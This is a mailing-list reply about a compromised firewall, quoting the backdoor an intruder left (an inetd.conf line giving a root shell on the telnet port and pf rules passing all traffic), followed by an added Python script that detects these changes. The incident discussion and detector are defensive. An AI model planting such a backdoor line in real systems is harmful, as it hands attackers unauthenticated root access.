[Gllug] My firewall is rooted

John HEARNS john.hearns at cern.ch
Mon Jul 15 13:43:23 UTC 2002


On Mon, 2002-07-15 at 14:26, Stephen Harker wrote:
> On Monday 15 July 2002 12:29, Xander D Harkness wrote:
> > I would expect there to be at least two or three back doors.
> 
> Well here's one...
> My inetd.conf file was renamed to inetd.conf.gay
> and the new one says...
> 
> telnet stream tcp nowait root /bin/ksh ksh
> 
> So that's pretty obvious.
> And my pf.conf rule became pf.conf.gay and the new one says...
> 
> pass in all
> pass out all
> 
> Which doesn't make it much of a firewall anymore :-(
> CRAP!!
> 
As Huw says, a good learning experience.

How about bringing the rogue disk along to a meeting?
We can keep it in a cage and poke sticks at it.

Seriously though - how about a writeup, and maybe 
a short talk?

* this is how I discovered that there was a compromise

* steps I took to immediately recover

* forensic traces

* tools you might use

* etc



-- 
Gllug mailing list  -  Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug
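
Added example, not part of the original messages: a Python check for the three changes described in the quoted post (an inetd.conf service whose server program is a shell, pf rules that pass all traffic, and a config file moved aside under a new suffix). The function names, the shell list and the sample input are assumptions constructed for illustration.

```python
# Added example: checks for the indicators described in the quoted post.
SHELLS = {"sh", "ksh", "csh", "tcsh", "bash", "zsh"}  # assumed list of shells
WATCHED = ("inetd.conf", "pf.conf")


def _rules(text):
    """Yield (line_no, stripped line) with comments and blank lines removed."""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if line:
            yield no, line


def shell_services(inetd_text):
    """inetd.conf entries whose server program (6th field) is a shell."""
    hits = []
    for no, line in _rules(inetd_text):
        f = line.split()
        # fields: service socktype proto wait user server-program [args...]
        if len(f) >= 6 and f[5].rsplit("/", 1)[-1] in SHELLS:
            hits.append((no, f[0], f[4], f[5]))
    return hits


def unconditional_pass(pf_text):
    """pf rules of the form 'pass [in|out] [log] [quick] all', no other qualifier."""
    hits = []
    for no, line in _rules(pf_text):
        t = line.split()
        if (t[0] == "pass" and t[-1] == "all"
                and set(t[1:-1]) <= {"in", "out", "log", "quick"}):
            hits.append((no, line))
    return hits


def renamed_copies(filenames):
    """Files named '<watched>.<suffix>', i.e. a possibly moved-aside original."""
    return sorted(n for n in filenames for w in WATCHED
                  if n.startswith(w + ".") and len(n) > len(w) + 1)


# Constructed sample input reproducing the lines quoted in the post.
SAMPLE_INETD = "# constructed sample\ntelnet stream tcp nowait root /bin/ksh ksh\n"
SAMPLE_PF = "pass in all\npass out all\n"
SAMPLE_ETC = ["inetd.conf", "inetd.conf.gay", "pf.conf", "pf.conf.gay", "passwd"]

if __name__ == "__main__":
    print(shell_services(SAMPLE_INETD))
    print(unconditional_pass(SAMPLE_PF))
    print(renamed_copies(SAMPLE_ETC))
```

The pf check is a heuristic: it flags only rules with no interface, protocol, address or state qualifier, so a ruleset made up solely of such rules is the case worth investigating.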



